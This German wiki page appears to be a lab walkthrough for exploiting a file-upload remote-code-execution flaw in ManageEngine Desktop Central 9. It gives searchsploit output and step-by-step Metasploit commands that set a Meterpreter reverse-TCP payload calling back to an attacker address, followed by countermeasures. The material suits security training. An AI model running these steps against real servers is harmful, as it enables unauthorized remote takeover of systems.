Manager Central Schwachstelle

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen

Details zur Schwachstelle: ManageEngine Desktop Central - FileUploadServlet ConnectionId Exploit

  • Schwachstelle: Unsichere Datei-Upload-Funktion in ManageEngine Desktop Central ermöglicht einem Angreifer die Ausführung von Remote-Code (RCE). Diese *Schwachstelle erlaubt es, speziell gestaltete Dateien hochzuladen, die vom Server ausgeführt werden, was zur Kompromittierung des Systems führt.
  • Angriffspunkt: Die Schwachstelle befindet sich im HTTP-Dienst von ManageEngine Desktop Central, der auf Port 8383 läuft. Ein Angreifer kann speziell gestaltete HTTP-Anfragen an den Server senden, um eine Datei hochzuladen und Code auszuführen.

Ausnutzung: Ein Angreifer kann ein Exploit-Modul (z. B. Metasploit) verwenden, um diese Schwachstelle auszunutzen und eine Reverse-Shell zu erhalten.

Warum dieser Exploit?

  • Ein Nmap-Scan des Zielsystems (10.0.10.107) ergab, dass der Port 8383 für den Apache HTTP-Dienst geöffnet ist, der von ManageEngine Desktop Central verwendet wird.

Exploit suchen

  • searchsploit "ManageEngine Desktop Central 9"
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                           |  Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
ManageEngine Desktop Central - 'FileStorage getChartImage' Deserialization / Unauthenticated Remote Code Execution       | multiple/webapps/48176.py
ManageEngine Desktop Central - Arbitrary File Upload / Remote Code Execution                                             | jsp/webapps/34518.txt
ManageEngine Desktop Central - Create Administrator                                                                      | multiple/webapps/43892.txt
ManageEngine Desktop Central - Java Deserialization (Metasploit)                                                         | multiple/remote/48224.rb
ManageEngine Desktop Central 10.0.271 - Cross-Site Scripting                                                             | java/webapps/45499.txt
ManageEngine Desktop Central 8.0.0 build < 80293 - Arbitrary File Upload                                                 | jsp/webapps/29674.txt

ManageEngine Desktop Central 9 - FileUploadServlet ConnectionId (Metasploit) | jsp/remote/38982.rb 

ManageEngine Desktop Central 9 Build 90087 - Cross-Site Request Forgery                                                  | multiple/webapps/35980.html
ManageEngine Desktop Central StatusUpdate - Arbitrary File Upload (Metasploit)                                           | windows/remote/34594.rb
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results


  • Wir haben die verfügbaren Exploits mit dem Befehl `searchsploit "ManageEngine Desktop Central 9"` durchsucht und festgestellt, dass der Exploit "ManageEngine Desktop Central 9 - FileUploadServlet ConnectionId (Metasploit)" (`jsp/remote/38982.rb`) speziell für die Version 9 von ManageEngine Desktop Central entwickelt wurde und bereits als Metasploit-Modul verfügbar ist. Dies machte es zu einer idealen Wahl für die Ausnutzung.

Schritte zur Ausnutzung

  • Starte die Metasploit-Konsole:
 msfconsole
  • Wähle das Exploit-Modul für den FileUploadServlet ConnectionId Exploit:
 use exploit/windows/http/manageengine_connectionid_write
  • Setze die Optionen für das Zielsystem und die Payload:
 set RHOST 10.0.10.107   # Ziel-IP-Adresse  
 set RPORT 8383          # Ziel-Port  
 set LHOST 10.0.10.101   # Angreifer-IP-Adresse für die Reverse-Shell  
 set LPORT 4444          # Lokaler Port für die Verbindung  
 set PAYLOAD windows/meterpreter/reverse_tcp  # Payload-Typ
  • Überprüfe die Optionen, um sicherzustellen, dass sie korrekt gesetzt sind:
 show options
  • Führe den Exploit aus:
 exploit
  • Überprüfe die Verbindung:

Wenn der Exploit erfolgreich ist, erhältst du eine Meterpreter-Sitzung. Von hier aus kannst du weitere Post-Exploitation-Schritte ausführen, wie z.B. Privilegien-Eskalation, Dateisystem durchsuchen, usw.

Warum ist diese Schwachstelle gefährlich?

  • Remote Code Execution (RCE): Ermöglicht es einem Angreifer, beliebige Befehle auf dem Zielsystem auszuführen.
  • Volle Kompromittierung: Ein erfolgreicher Angriff führt zur vollständigen Kontrolle des betroffenen Servers.
  • Einfacher Angriff auf ungeschützte Systeme: Ungepatchte Versionen von ManageEngine Desktop Central sind besonders gefährdet.

Gegenmaßnahmen

  • Aktualisiere ManageEngine Desktop Central auf die neueste Version, die diese Schwachstelle behebt.
  • Setze Web Application Firewalls (WAFs) und Intrusion Detection/Prevention Systems (IDS/IPS) ein, um bösartige Anfragen zu blockieren.
  • Deaktiviere unnötige Dienste und überprüfe die Konfigurationseinstellungen regelmäßig.
Abgerufen von „http://wiki.ixheim.de/index.php?title=Manager_Central_Schwachstelle&oldid=55932